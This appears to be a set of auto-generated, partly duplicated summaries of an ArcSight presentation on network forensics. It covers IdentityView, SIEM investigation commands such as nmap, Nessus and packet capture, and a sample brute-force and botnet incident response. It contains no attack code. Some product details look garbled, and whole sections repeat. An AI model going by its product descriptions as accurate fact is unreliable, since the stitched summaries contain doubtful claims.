How To Become An ArcSight CSI

Summary:

This text discusses a product called IdentityView, which is part of ArcSight's security suite. The purpose of IdentityView is to provide detailed attribution for all user activities and generate reports on specific users' actions. It can integrate with various systems such as third-party ticketing systems (like ServiceNow), Threat Response Manager (TRM) for investigating potential policy violations, HR systems for monitoring certain types of user activity like those related to contractors or terminated employees, and applications for maintaining a baseline of normal behavior and alerting when there are misuse cases. The document also includes information on several specific investigation commands that can be executed using the tool: - Investigate: Blacklisted Sites - This command checks if an IP address is blacklisted by querying external databases. - Investigate: DNS Lookup - Resolves the domain name of a selected item to its corresponding IP address. - Investigate: Internet Port Scan - Scans the open ports on a specific IP address or domain using Nmap, which is a network scanning tool. - Investigate: Malware Protection Center (Target Address) - Checks if a given target IP address has any known malware associated with it through Microsoft's resources. - Investigate: NBTstat - Displays information about the NetBIOS names on a specific network segment and can be used to identify hosts that are active on the network. - Investigate: NetWitness Integration - Provides a visual representation of the integration with NetWitness, presumably for deeper investigation or analysis within the tool's ecosystem. - Investigate: NMAP (UDP) - Performs an UDP scan on specified IP addresses using the Nmap tool to detect open UDP ports and gather information about the services running on them. - Investigate: Open Shares - Lists all network shares available from a given IP address, which can be useful for security auditing. These commands are designed to help analysts in various aspects of cybersecurity, including but not limited to detecting unauthorized access attempts, identifying potential threats, and monitoring compliance with corporate policies. This document outlines various investigation commands used in a system or network monitoring tool, named ArcSight. The commands are designed to gather information about different data types such as IP addresses and strings. Here's a summary of each command mentioned: 1. **Investigate: OS Fingerprint** - Uses the nmap tool to perform an OS fingerprint scan on the selected IP address or string input, displaying detailed network mapping and operating system detection. 2. **Investigate: Packet Capture** - Utilizes windump to capture network packets from a specific interface (interface 3) for analysis of data passing through the IP address or string entered. This is useful for capturing real-time traffic on a targeted device. 3. **Investigate: PathPing** - Runs a diagnostic tool called pathping, which measures and displays the route taken by packets to the specified IP address or string, providing information about packet loss and latency along the way. 4. **Investigate: RFC Ignorant** - A web-based tool accessed via URL that provides details about the domain associated with the given IP address or string, such as DNS information and related domains. 5. **Investigate: SMTP Check** - Uses an external service (Mxtoolbox) to check the configuration of the Simple Mail Transfer Protocol (SMTP) for the specified email server IP address or string. 6. **Investigate: Suspected Malware (Target Address)** - Queries a database of known malicious domains to see if the target IP address is listed as associated with malware activity. 7. **Investigate: Threat Expert** - Similar to the previous, this command checks for threats related to the domain or IP address against a list provided by Threatexpert.com, which may include information on potentially harmful websites or files. 8. **Investigate: Vulnerability Scan** - Utilizes Nessus software to scan the specified IP address for known vulnerabilities in network protocols and services running on it (e.g., ports 139, 445, 10150, and 34477). 9. **Investigate: Windows Event** - Provides detailed information about specific Windows events using a third-party database lookup service, which can be accessed through the interface by specifying the event class ID of the device. Each command is associated with a configuration name, attributes, and context that define where it can be used within the ArcSight system (e.g., in Viewer, Editor, or Assets). The commands are designed to help users analyze network traffic, detect potential threats, check for vulnerabilities, and gather information about connected devices using various methods including script execution, URL querying, and external tool integrations.

Details:

The article discusses how to become an ArcSight C.S.I., which stands for Collect, Store, Investigate. It explains that network forensics involves using science and technology to collect, fuse, identify, examine, correlate, analyze, and document digital evidence from multiple sources for the purpose of uncovering facts related to unauthorized activities meant to disrupt, corrupt, or compromise systems. The article highlights the challenges faced by cyber investigators such as islands of defense, large volumes of data, preserving evidence, using various tools without a workflow, ensuring admissibility, and lacking interception points. ArcSight assists in investigations by providing centralized data collection with a single pane-of-glass view, 40+ TB of log storage for forensic analysis, integration with third-party tools, automated or manual execution capabilities, integrated case management to establish chain-of-custody, and the ability to quarantine threats during an investigation. ArcSight also offers IdentityView for monitoring employee activity by name and Threat Detector for establishing baselines and detecting deviations from normal behavior. Additionally, it provides real-time input from open-source threat intelligence feeds through Threat Intelligence Accelerator. The article contrasts a 12+ hour investigation without ArcSight with one that takes only 3 hours when using ArcSight. It also lists typical use cases for corporate investigations and discusses the challenges faced by cyber investigators. The provided text outlines a cybersecurity incident response process involving multiple steps and actions taken to investigate an alleged brute-force attack against a financial system in Hong Kong. Here's a summary of the key points from the text: 1. **Initial Request for Logs**: A user requested logs from the server team, which was denied without manager approval. The request was escalated through management to obtain the necessary logs. 2. **Firewall Analysis**: After logging into the firewall console and identifying consistent traffic from IP 172.16.100.2, Snort was set up with a signature to monitor this activity. However, due to low disk space, the capture had to be stopped after capturing around 6 GB of data. 3. **Log Collection**: The server team eventually provided logs which were analyzed using Grep for instances of IP 172.16.100.2. These logs indicated numerous authentication failures related to the user "admin" and OpenLDAP. 4. **Threat Analysis**: Snort alerts suggested a continuous attempt to connect to the finance server at high rates (over 100 attempts per second) and other consistent activity every 10 minutes with another IP on the internet. Searching online led to the assumption that this target IP was associated with malware or a botnet. 5. **Isolation**: The network team was contacted to disable the switch port connected to the host identified as compromised (IP 172.16.100.2). Confirmation of quarantine completion was received from the network team. 6. **Incident Detection and Response with ArcSight**: An ESM console was used to create a case for the suspected attack on the finance system, filtering activities related to IP 172.16.100.2. Further analysis included using Snort for packet capture, NMAP for OS fingerprinting, VA scanning, and Black List lookups. 7. **Malware Identification**: The malware was identified as Bredolab C&C after discovering it was registered on a blacklist and having details in the Malware Protection Center. 8. **Case Documentation and Assignment**: All findings were documented in the case editor, with the assessment that the host had been compromised by hackers using brute-force attacks against the finance system. The case was assigned to the network team for further action. This summary highlights the use of various tools (firewall console, Snort, Grep, NMAP, VA scanning, and blacklist lookups) in a systematic incident response process involving log analysis, packet capture, and malware identification to detect and respond to an alleged cyber attack. ArcSight is a cybersecurity company that offers a platform for network monitoring, security information and event management (SIEM), and unified threat management. The provided document outlines the various features and functionalities of ArcSight's Extended Security Manager (ESM) 4.5 SP1, focusing on its integration capabilities with different tools and commands for investigating cyber threats. The ESM platform includes several key components:

• **ICS (Industrial Control Systems)**: Integrates with VoIP (Voice over Internet Protocol), enabling real-time communication and data exchange to monitor industrial processes more effectively.

• **Store**: This component involves the storage of log files, a database for managing ACID transactions, using technologies like MySQL, as well as storing payload data related to security incidents.

• **Investigate**: This module is focused on analyzing cyber threats through various tools and methods:

• **Event Normalization**: Standardizes event details across different sources for easier analysis.

• **Identity Correlation / User Monitoring**: Analyzes user activities to identify patterns or anomalies that may indicate security breaches.

• **Session Re-Assembly**: Reconstructs network sessions to understand the sequence and flow of events, which is crucial in forensic investigations.

• **Case Management**: Manages all aspects of an investigation through a workflow system, including reporting and maintaining chain-of-custody/integrity.

• **Tools Integration**: Introduces new integration commands that allow for lightweight data exchange between information sources:

• Command execution mechanisms include URI (HTTP), local script/executable, and CounterAct Connector (TRM).

• Result rendering can be internal or external web browser display, executing script outputs, attaching results to a case, or saving them as files.

• **Integration Commands**: These are specific tools used for investigation:

• DNS Lookup, Malware Protection Center, OS Fingerprint, Vulnerability Scan, and more, each corresponding to different network tasks like scanning ports, checking for malware, or identifying system vulnerabilities.

• **Scenario Examples**: Illustrate how integration commands can be applied in real scenarios, such as investigating suspicious activity related to "badguy.net".

• **Cyber Investigation Considerations**: Addresses the practicalities of choosing compatible tools based on operating systems and considering remote execution options for packet capture or other tasks.

The document also introduces ArcSight Threat Detector, which aids analysts in identifying logical relationships between events during investigations, enhancing the correlation process significantly. The integration commands are designed to be flexible, allowing for local command execution across various network tasks, with results being documented and added as attachments to cases for long-term tracking and reporting. Overall, this document serves to demonstrate how ArcSight ESM 4.5 SP1 enhances cyber investigation capabilities through comprehensive integration of diverse tools and robust case management features, enabling faster identification and response to potential threats. This text discusses the capabilities of a product called IdentityView, which is part of ArcSight's security suite. The purpose of IdentityView is to provide detailed attribution for all user activities and generate reports on specific users' actions. It can also integrate with various systems such as third-party ticketing systems (like ServiceNow), Threat Response Manager (TRM) for investigating potential policy violations, HR systems for monitoring certain types of user activity like those related to contractors or terminated employees, and applications for maintaining a baseline of normal behavior and alerting when there are misuse cases. The document also includes information on several specific investigation commands that can be executed using the tool:

• Investigate: Blacklisted Sites - This command checks if an IP address is blacklisted by querying external databases.

• Investigate: DNS Lookup - Resolves the domain name of a selected item to its corresponding IP address.

• Investigate: Internet Port Scan - Scans the open ports on a specific IP address or domain using Nmap, which is a network scanning tool.

• Investigate: Malware Protection Center (Target Address) - Checks if a given target IP address has any known malware associated with it through Microsoft's resources.

• Investigate: NBTstat - Displays information about the NetBIOS names on a specific network segment and can be used to identify hosts that are active on the network.

• Investigate: NetWitness Integration - Provides a visual representation of the integration with NetWitness, presumably for deeper investigation or analysis within the tool's ecosystem.

• Investigate: NMAP (UDP) - Performs an UDP scan on specified IP addresses using the Nmap tool to detect open UDP ports and gather information about the services running on them.

• Investigate: Open Shares - Lists all network shares available from a given IP address, which can be useful for security auditing.

These commands are designed to help analysts in various aspects of cybersecurity, including but not limited to detecting unauthorized access attempts, identifying potential threats, and monitoring compliance with corporate policies. This document outlines various investigation commands used in a system or network monitoring tool, named ArcSight. The commands are designed to gather information about different data types such as IP addresses and strings. Here's a summary of each command mentioned: 1. **Investigate: OS Fingerprint** - Uses the nmap tool to perform an OS fingerprint scan on the selected IP address or string input, displaying detailed network mapping and operating system detection. 2. **Investigate: Packet Capture** - Utilizes windump to capture network packets from a specific interface (interface 3) for analysis of data passing through the IP address or string entered. This is useful for capturing real-time traffic on a targeted device. 3. **Investigate: PathPing** - Runs a diagnostic tool called pathping, which measures and displays the route taken by packets to the specified IP address or string, providing information about packet loss and latency along the way. 4. **Investigate: RFC Ignorant** - A web-based tool accessed via URL that provides details about the domain associated with the given IP address or string, such as DNS information and related domains. 5. **Investigate: SMTP Check** - Uses an external service (Mxtoolbox) to check the configuration of the Simple Mail Transfer Protocol (SMTP) for the specified email server IP address or string. 6. **Investigate: Suspected Malware (Target Address)** - Queries a database of known malicious domains to see if the target IP address is listed as associated with malware activity. 7. **Investigate: Threat Expert** - Similar to the previous, this command checks for threats related to the domain or IP address against a list provided by Threatexpert.com, which may include information on potentially harmful websites or files. 8. **Investigate: Vulnerability Scan** - Utilizes Nessus software to scan the specified IP address for known vulnerabilities in network protocols and services running on it (e.g., ports 139, 445, 10150, and 34477). 9. **Investigate: Windows Event** - Provides detailed information about specific Windows events using a third-party database lookup service, which can be accessed through the interface by specifying the event class ID of the device. Each command is associated with a configuration name, attributes, and context that define where it can be used within the ArcSight system (e.g., in Viewer, Editor, or Assets). The commands are designed to help users analyze network traffic, detect potential threats, check for vulnerabilities, and gather information about connected devices using various methods including script execution, URL querying, and external tool integrations.